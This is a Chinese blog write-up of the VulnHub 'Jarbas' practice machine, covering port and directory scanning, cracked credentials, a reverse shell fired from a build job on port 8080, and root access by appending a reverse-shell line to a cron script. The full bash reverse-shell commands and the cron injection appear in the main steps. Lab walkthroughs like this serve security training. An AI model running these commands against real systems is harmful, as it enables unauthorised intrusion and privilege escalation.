首页 > 其他分享 >vulnhub - Jarbas

vulnhub - Jarbas

时间:2024-08-15 16:50:02浏览次数:4  
标签:bin 8080 etc 192.168 Jarbas vulnhub eder bash

vulnhub - Jarbas

信息收集

image-20240814170213217

sudo nmap -sT -sV -sC -O -p22,80,3306,8080 192.168.157.176

image-20240814170506666

sudo nmap -script=vuln -p22,80,3306,8080 192.168.157.176

image-20240814171222768

有robots.txt

# we don't want robots to click "build" links

8080是后台登录

目录扫描

扫一下目录(不指定-x php,html的话没扫到)

sudo gobuster dir -u http://192.168.157.176 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html

image-20240814172939527

有/access.html

image-20240815161341538

解完md5得到三个用户及密码

tiago:italia99
trindade:marianna
eder:vipsu

其中eder:vipsu可以登录8080的后台

登入CMS反弹shell

创建项目后翻找可以执行命令的地方

image-20240815162249330

直接弹shell

/bin/bash -i >& /dev/tcp/192.168.157.161/9999 0>&1

保存后构建即可

image-20240815162526760

没有权限

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash

crontab提权

查看系统定时任务: cat /etc/crontab

发现了一个每五分钟定期执行的sh脚本CleaningScript.sh

image-20240815162911790

将反弹Shell的命令写入脚本文件

echo "/bin/bash -i >& /dev/tcp/192.168.157.161/7777 0>&1" >> /etc/script/CleaningScript.sh

等shell就好了

image-20240815163644072

标签:bin,8080,etc,192.168,Jarbas,vulnhub,eder,bash
From: https://www.cnblogs.com/Mar10/p/18361310

相关文章

  • Vulnhub JIS-CTF靶机详解
    项目地址https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/修改靶机的网卡开机时长按shift,进入此页面选择root模式进入将只读模式改为读写模式mount-oremount,rw/查看本机的网卡名称ifconfig-a修......
  • VulnhubJIS-CTF靶机详解
    项目地址https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/修改靶机的网卡开机时长按shift,进入此页面选择第二个,进入等待加载完成选择root模式进入将只读模式改为读写模式mount-oremount,rw/查看本机的网卡名称ifconfig-a修改默认网卡......
  • vulnhub oscp
    信息搜集首先探测内网存活主机nmap-sP192.168.19.128/24发现存活主机192168.19.140,然后扫描开放端口nmap-p-192.168.19.140结果如下22/tcpopenssh80/tcpopenhttp33060/tcpopenmysqlx这个mysqlx端口肯定是有说法的.访问80端口渗透发现下面的一段......
  • VulnhubJANGOW靶机详解
    项目地址https://www.vulnhub.com/entry/jangow-101754/部分vmware有配置问题,需要修改网卡信息,重启dhcp服务1.在系统启动时(长按shift键)直到显示以下界面选择第二个,按回车继续选择第二个2.按e进入编辑,进入以下界面删除"recoverynomodeset"并在末尾添加"quiets......
  • 【Vulnhub系列】Vulnhub Noob 靶场渗透(原创)
    【Vulnhub系列靶场】VulnhubNoob靶场渗透原文转载已经过授权原文链接:Lusen的小窝-学无止尽,不进则退(lusensec.github.io)一、主机发现二、端口扫描有一个go.php的form表单接收文件这里识别21端口存在未授权,55077是ssh的服务端口三、web渗透1、web信息收......
  • Vulnhub靶场DC-9练习
    目录0x00准备0x01主机信息收集0x02站点信息收集0x03漏洞查找与利用1.发现SQL注入点2.Sqlmap跑数据3.文件包含4.SSH爆破+端口敲门服务5.提权(写入/etc/passwd)0x04总结0x00准备下载链接:https://download.vulnhub.com/dc/DC-9.zip介绍:Theultimategoal......
  • VulnhubAI-web 1.0靶机详解
    项目地址https://www.vulnhub.com/entry/ai-web-1,353/实验过程将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机使用nmap进行主机发现,获取靶机IP地址nmap192.168.47.1-254根据对比可知DC-8的一个ip地址为192.168.47.135扫描Ai-Web......
  • Vulnhub靶机:JANGOW_ 1.0.1
    目录前言:一、安装虚拟机Jangow:1.0.1靶机二、Web部分前言:难度:简单,本文使用VirtualBox打开,下载地址:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova一、安装虚拟机Jangow:1.0.1靶机1.选择下载的Jangow:1.0.1的文件路径。不要放C盘,不要放C盘。放在自己能记住......
  • 【Vulnhub系列】Vulnhub_Dr4g0n_b4ll 靶场渗透(原创)
    【Vulnhub系列靶场】Vulnhub_Dr4g0n_b4ll靶场渗透原文转载已经过授权原文链接:Lusen的小窝-学无止尽,不进则退(lusensec.github.io)一、环境搭建选择打开.ovf文件配置名称和路径打开后调整网络连接模式为【NAT】即可二、信息收集1、主机发现nmap.exe-sn192.1......
  • 【Vulnhub靶机之Hackme】
     第一步:打开靶机 第二步:查看虚拟靶机ip、第三步:查看连接80端口的ip第四步:扫描出靶机的ip地址第五步:扫描靶机地址下的目录访问login.php目录点击注册点击,可以看到许多的书名 第六步:使用burpsuite抓包在111后面加*号保存抓到的文件为post.txt第七步:使用......